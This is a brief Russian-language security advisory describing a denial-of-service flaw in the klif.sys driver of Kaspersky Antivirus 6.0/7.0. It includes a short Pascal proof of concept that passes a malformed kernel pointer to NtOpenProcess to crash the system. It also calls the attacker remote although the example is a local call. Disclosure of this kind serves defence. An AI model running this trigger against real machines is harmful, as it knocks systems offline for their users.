Программа: Kaspersky Antivirus 6.0/7.0

Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных данных в драйвере klif.sys при обработке NtOpenProcess с некорректными параметрами.
Атакующий может передать специально сформированные данные, что приведет к отказу системы в обслуживании.

Пример на языке Pascal:

var
  ob1: OBJECT_ATTRIBUTES;
  p1: DWORD;
begin
  ob1.Length := sizeof(ob1);
  NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;



Оставить мнение